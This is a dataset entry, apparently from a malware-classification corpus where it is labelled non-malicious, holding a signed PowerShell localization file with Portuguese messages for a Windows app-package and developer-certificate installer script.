full_path
stringlengths
31
232
filename
stringlengths
4
167
content
stringlengths
0
48.3M
combined_dataset/train/non-malicious/sample_34_80.ps1
sample_34_80.ps1
# Localized 12/03/2020 06:20 PM (GMT) 303:4.80.0411 Add-AppDevPackage.psd1 # Culture = "en-US" ConvertFrom-StringData @' ###PSLOC PromptYesString=&Sim PromptNoString=&Não BundleFound=Encontrou o pacote: {0} PackageFound=Encontrado o pacote: {0} EncryptedBundleFound=Lote criptografado encontrado: {0} EncryptedPackageFound=Pacote criptografado encontrado: {0} CertificateFound=Encontrou o certificado: {0} DependenciesFound=Encontrou pacotes de dependência: GettingDeveloperLicense=Adquirindo licença de desenvolvedor... InstallingCertificate=Instalando certificado... InstallingPackage=\nInstalando aplicativo... AcquireLicenseSuccessful=Uma licença de desenvolvedor foi adquirida com sucesso. InstallCertificateSuccessful=O certificado foi instalado com êxito. Success=\nSuccesso: o aplicativo foi instalado com êxito. WarningInstallCert=\nVocê está prestes a instalar um certificado digital para o repositório de certificados de Pessoas Confiáveis do computador. Isso apresenta um sério risco de segurança e deve ser feito apenas se você confiar na origem desse certificado.\n\nQuando você terminar de usar este aplicativo, deve remover manualmente o certificado digital associado. Instruções sobre como fazer isso podem ser encontradas aqui: http://go.microsoft.com/fwlink/?LinkId=243053\n\nTem certeza de que deseja continuar?\n\n ElevateActions=\nAntes de instalar esse aplicativo, você precisa fazer o seguinte: ElevateActionDevLicense=\t- Adquirir uma licença de desenvolvedor ElevateActionCertificate=\t- Instalar o certificado de autenticação ElevateActionsContinue=Credenciais de administrador são necessárias para continuar. Aceite o prompt do UAC e forneça a senha do administrador, se solicitado. ErrorForceElevate=Você deve fornecer credenciais de administrador para continuar. Execute este script sem o parâmetro -Force ou a partir de uma janela elevada do PowerShell. ErrorForceDeveloperLicense=A aquisição de uma licença de desenvolvedor requer interação do usuário. Execute o script novamente sem o parâmetro -Force. ErrorLaunchAdminFailed=Erro: não foi possível iniciar um novo processo como administrador. ErrorNoScriptPath=Erro: você deve iniciar este script a partir de um arquivo. ErrorNoPackageFound=Erro: nenhum pacote ou grupo encontrado no diretório do script. Verifique se o pacote ou grupo que você deseja instalar está colocado no mesmo diretório que o script. ErrorManyPackagesFound=Erro: mais de um pacote ou grupo encontrado no diretório do script. Verifique se apenas o pacote ou grupo que você deseja instalar está colocado no mesmo diretório que o script. ErrorPackageUnsigned=Erro: o pacote ou grupo não está assinado digitalmente ou sua assinatura está corrompida. ErrorNoCertificateFound=Erro: nenhum certificado encontrado no diretório do script. Verifique se o certificado usado para assinar o pacote ou grupo sendo instalado está colocado no mesmo diretório que o script. ErrorManyCertificatesFound=Erro: mais de um certificado encontrado no diretório do script. Verifique se somente o certificado usado para assinar o pacote ou o grupo sendo instalado está colocado no mesmo diretório que o script. ErrorBadCertificate=Erro: o arquivo "{0}" não é um certificado digital válido. CertUtil retornou com o código de erro {1}. ErrorExpiredCertificate=Erro: o certificado de desenvolvedor "{0}" expirou. Uma causa possível é que o relógio do sistema não está definido com a data e hora corretas. Se as configurações do sistema estiverem corretas, entre em contato com o proprietário do aplicativo para recriar um pacote ou grupo com um certificado válido. ErrorCertificateMismatch=Erro: o certificado não corresponde ao usado para assinar o pacote ou grupo. ErrorCertIsCA=Erro: o certificado não pode ser uma autoridade de certificação. ErrorBannedKeyUsage=Erro: o certificado não pode ter o uso da seguinte chave: {0}. Uso de chave deve ser igual a "DigitalSignature" ou não especificado. ErrorBannedEKU=Erro: o certificado não pode ter o seguinte uso estendido da chave: {0}. São permitidos apenas a Assinatura de Código e EKUs de Assinatura de Tempo de Vida. ErrorNoBasicConstraints=Erro: o certificado não tem a extensão de restrições básicas. ErrorNoCodeSigningEku=Erro: o certificado está faltando o uso estendido da chave de Assinatura de Código. ErrorInstallCertificateCancelled=Erro: a instalação do certificado foi cancelada. ErrorCertUtilInstallFailed=Erro: não foi possível instalar o certificado. CertUtil retornou com o código de erro {0}. ErrorGetDeveloperLicenseFailed=Erro: não foi possível adquirir uma licença de desenvolvedor. Para obter mais informações, consulte http://go.microsoft.com/fwlink/?LinkID=252740. ErrorInstallCertificateFailed=Erro: não foi possível instalar a licença de desenvolvedor. Status: {0}. Para obter mais informações, consulte http://go.microsoft.com/fwlink/?LinkID=252740. ErrorAddPackageFailed=Erro: não foi possível instalar o aplicativo. ErrorAddPackageFailedWithCert=Erro: não foi possível instalar o aplicativo. Para garantir a segurança, considere desinstalar o certificado de assinatura até que você possa instalar o aplicativo. Instruções para fazer isso podem ser encontradas aqui: :\nhttp://go.microsoft.com/fwlink/?LinkId=243053 '@ # SIG # Begin signature block # MIInwgYJKoZIhvcNAQcCoIInszCCJ68CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCQ+kquIKiMP1sk # 28x5PgiDxzZrx02RUWnfYhigpt/1TKCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGaIwghmeAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEICGjd/Gpe9H16zN1OxzSWI7+ # bJAlYVzmnwNrAcE9viubMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAOtYs0swjQRlInxVngjX3VYF584ZeS4OKVL9n1Okdv2rghF2cZy9Yi/4C # G183MC/8B/BGQw0hMAI4FctxLCboSR1HeBkEuPCJRsoxY/QyiPwZGgLyHlxgqQZX # lyFVPpVacYlzM6pEm27ZN0LgRiiMx0mnD6NhZjUoCE0RLQ9dDL7h6hC8hdZZNl5N # MGBRXbwhZ1d4QXtJvdJBYWl6/YURW6llOGmfc0MXmnkxNzMMu7ObXUO0hwWDWzm6 # LrqwEaeM8om2WtouwcHKxS0Z0rxAwdmXMpUFJRgZjqQ/60ZodrmaV2lJj60iJPTu # EKpxfOFHFpZa5FjgS6KztcTev9oh2qGCFywwghcoBgorBgEEAYI3AwMBMYIXGDCC # FxQGCSqGSIb3DQEHAqCCFwUwghcBAgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDBDMF9Y+hiSeXN4cOEJZUb25jaC5pWKC6MZM1HuKJmOgIGZfxnFT1T # GBMyMDI0MDQwNDIwNDIxMi41OThaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjJBRDQtNEI5Mi1GQTAxMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIRezCCBycwggUPoAMCAQICEzMAAAHenkielp8oRD0AAQAAAd4wDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzEyWhcNMjUwMTEwMTkwNzEyWjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoyQUQ0LTRC # OTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALSB9ByF9UIDhA6xFrOniw/x # sDl8sSi9rOCOXSSO4VMQjnNGAo5VHx0iijMEMH9LY2SUIBkVQS0Ml6kR+TagkUPb # aEpwjhQ1mprhRgJT/jlSnic42VDAo0en4JI6xnXoAoWoKySY8/ROIKdpphgI7OJb # 4XHk1P3sX2pNZ32LDY1ktchK1/hWyPlblaXAHRu0E3ynvwrS8/bcorANO6Djuysy # S9zUmr+w3H3AEvSgs2ReuLj2pkBcfW1UPCFudLd7IPZ2RC4odQcEPnY12jypYPnS # 6yZAs0pLpq0KRFUyB1x6x6OU73sudiHON16mE0l6LLT9OmGo0S94Bxg3N/3aE6fU # bnVoemVc7FkFLum8KkZcbQ7cOHSAWGJxdCvo5OtUtRdSqf85FklCXIIkg4sm7nM9 # TktUVfO0kp6kx7mysgD0Qrxx6/5oaqnwOTWLNzK+BCi1G7nUD1pteuXvQp8fE1Kp # TjnG/1OJeehwKNNPjGt98V0BmogZTe3SxBkOeOQyLA++5Hyg/L68pe+DrZoZPXJa # GU/iBiFmL+ul/Oi3d83zLAHlHQmH/VGNBfRwP+ixvqhyk/EebwuXVJY+rTyfbRfu # h9n0AaMhhNxxg6tGKyZS4EAEiDxrF9mAZEy8e8rf6dlKIX5d3aQLo9fDda1ZTOw+ # XAcAvj2/N3DLVGZlHnHlAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUazAmbxseaapg # dxzK8Os+naPQEsgwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBAOKUwHsXDacGOvUI # gs5HDgPs0LZ1qyHS6C6wfKlLaD36tZfbWt1x+GMiazSuy+GsxiVHzkhMW+FqK8gr # uLQWN/sOCX+fGUgT9LT21cRIpcZj4/ZFIvwtkBcsCz1XEUsXYOSJUPitY7E8bbld # mmhYZ29p+XQpIcsG/q+YjkqBW9mw0ru1MfxMTQs9MTDiD28gAVGrPA3NykiSChvd # qS7VX+/LcEz9Ubzto/w28WA8HOCHqBTbDRHmiP7MIj+SQmI9VIayYsIGRjvelmNa # 0OvbU9CJSz/NfMEgf2NHMZUYW8KqWEjIjPfHIKxWlNMYhuWfWRSHZCKyIANA0aJL # 4soHQtzzZ2MnNfjYY851wHYjGgwUj/hlLRgQO5S30Zx78GqBKfylp25aOWJ/qPhC # +DXM2gXajIXbl+jpGcVANwtFFujCJRdZbeH1R+Q41FjgBg4m3OTFDGot5DSuVkQg # jku7pOVPtldE46QlDg/2WhPpTQxXH64sP1GfkAwUtt6rrZM/PCwRG6girYmnTRLL # sicBhoYLh+EEFjVviXAGTk6pnu8jx/4WPWu0jsz7yFzg82/FMqCk9wK3LvyLAyDH # N+FxbHAxtgwad7oLQPM0WGERdB1umPCIiYsSf/j79EqHdoNwQYROVm+ZX10RX3n6 # bRmAnskeNhi0wnVaeVogLMdGD+nqMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtcwggJAAgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoy # QUQ0LTRCOTItRkEwMTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUAaKBSisy4y86pl8Xy22CJZExE2vOggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOm5WKQwIhgPMjAyNDA0MDUwMDQ5NDBaGA8yMDI0MDQwNjAwNDk0MFowdzA9Bgor # BgEEAYRZCgQBMS8wLTAKAgUA6blYpAIBADAKAgEAAgIGzwIB/zAHAgEAAgIR+TAK # AgUA6bqqJAIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIB # AAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAETWsZmA4SFylu2U # 50Zg9cuRI4+t8afMv34B2RXd/d5JnHpcUaETz8lgNX/+HTD0SrALBaSZOB7BlOHu # fsSxR4vKQed09vTJ/amFHb+6QtQwLxsJAbZ+GXEnYA4tsE2IPCElU7ffWIBxCAl1 # FWo3Y1n60XVsp7N1djPZNeU5TmO1MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHenkielp8oRD0AAQAAAd4wDQYJYIZIAWUD # BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B # CQQxIgQgTB+K5Lha+oIp4CdvStGEbktq7XBneFEUGO605/j4VlcwgfoGCyqGSIb3 # DQEJEAIvMYHqMIHnMIHkMIG9BCCOPiOfDcFeEBBJAn/mC3MgrT5w/U2z81LYD44H # c34dezCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u # MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp # b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB # 3p5InpafKEQ9AAEAAAHeMCIEID2hiK1qomnFBQKBgKWPbn5UzsuA1aMsE+kiWy5B # b0ObMA0GCSqGSIb3DQEBCwUABIICAKT8tiBvWIUNt6P3AO69yT8U5tzztXc1sije # 